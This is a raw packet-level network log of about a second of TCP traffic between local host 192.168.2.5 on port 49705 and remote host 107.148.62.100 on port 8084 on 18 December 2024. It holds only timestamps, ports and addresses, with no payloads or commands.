Dec 18, 2024 13:32:05.666049957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.666311979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.666369915 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.667085886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.671721935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.671775103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.671952009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.672458887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.672507048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.673592091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.673877954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.673923969 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.674220085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.675365925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.675421000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.675849915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.676256895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.676295996 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.677838087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.678004980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.678050995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.678555012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.681576014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.681621075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.681823015 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.682163000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.682207108 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.685877085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.686351061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.686392069 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.686733961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.688679934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.688724995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.689099073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.690058947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.690108061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.695329905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.695950985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.695991039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.696854115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.748377085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.774406910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.774745941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.774801016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.775271893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.775600910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.775651932 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.776019096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.776487112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.776530027 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.778363943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.778738022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.778785944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.779082060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.781061888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.781111002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.781192064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.781647921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.781698942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.798808098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.799030066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.799143076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.799524069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.853754997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.865932941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.866095066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.866166115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.866667032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.877358913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.877475023 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.877511978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.878093958 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.878173113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.880649090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.880999088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.881057024 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.881444931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.884562969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.884618998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.884936094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.885396957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.885447979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.887360096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.887622118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.887671947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.888199091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.888689995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.888753891 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.888982058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.889462948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.889535904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.890995026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.891277075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.891350031 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.891904116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.894996881 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.895061016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.895291090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.895849943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.896075010 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.899996996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.900309086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.900366068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.900861025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.902319908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.902364969 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.902614117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.903177977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.903228045 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.907193899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.907526970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.907577038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.908026934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.956135988 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.988991022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.989407063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.989501953 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.989643097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.989900112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.989950895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.990413904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.990848064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.990909100 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.992175102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.992538929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.992619038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.992808104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.995846033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.995908022 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.996062040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.996651888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.996701002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.012625933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.012959957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.013009071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.013484001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.057482004 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.081440926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.081453085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.081527948 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.082700968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.082715034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.082729101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.082768917 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.083870888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.083884001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.083930016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.090410948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.090492010 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.090651035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.091171026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.091233015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.093873024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.094163895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.094335079 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.094691992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.098443985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.098550081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.098712921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.099246979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.099294901 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.101257086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.101630926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.101681948 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.102169037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.103760004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.103815079 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.104032040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.104623079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.104676008 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.105334997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.105576038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.105627060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.106069088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.109026909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.109078884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.109278917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.109822989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.109874964 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.114092112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.114366055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.114418983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.114825010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.116296053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.116363049 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.116599083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.117120981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.117178917 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.121268034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.121515989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.121566057 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.122016907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.171802044 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.202229023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.202498913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.202594042 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.203057051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.203294992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.203350067 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.203829050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.204437971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.204494953 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.206074953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.206383944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.206439018 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.207036972 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.210294962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.210364103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.210608006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.210994005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.211050987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.211518049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.212311029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.212367058 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.226835012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.227046967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.227138042 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.227582932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.271904945 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.294076920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.294260025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.294326067 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.294825077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.295145035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.295193911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.295605898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.296135902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.296185970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.305624962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.306021929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.306077003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.307024002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.308430910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.308480978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.308809042 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.309287071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.309339046 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.313189030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.313492060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.313549995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.313982010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.315604925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.315661907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.315788031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.316191912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.316241026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.317790985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.318093061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.318176985 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.318615913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.319432020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.319484949 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.319691896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.320300102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.320346117 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.323082924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.323287964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.323343039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.323838949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.327949047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.328008890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.328438997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.329104900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.329154968 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.330357075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.330568075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.330614090 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.331136942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.335485935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.335537910 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.335777044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.336396933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.336446047 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.416409969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.416681051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.416759014 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.417283058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.417644024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.417700052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.417953014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.418520927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.418566942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.418811083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.418992996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.419034958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.419518948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.421077967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.421129942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.421344042 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.421904087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.421958923 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.423815012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.424180984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.424233913 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.424889088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.441093922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.441171885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.441360950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.441951990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.442003965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.508266926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.508554935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.508646965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.509113073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.509520054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.509567022 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.509835005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.510415077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.510459900 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.519103050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.519309044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.519385099 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.519915104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.521935940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.521989107 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.522161961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.522399902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.522473097 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.523014069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.530512094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.530601025 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.530631065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.531802893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.531914949 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.534301996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.534315109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.534326077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.534367085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.535494089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.535509109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.535521984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.535554886 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.535577059 CET	49705	8084	192.168.2.5	107.148.62.100
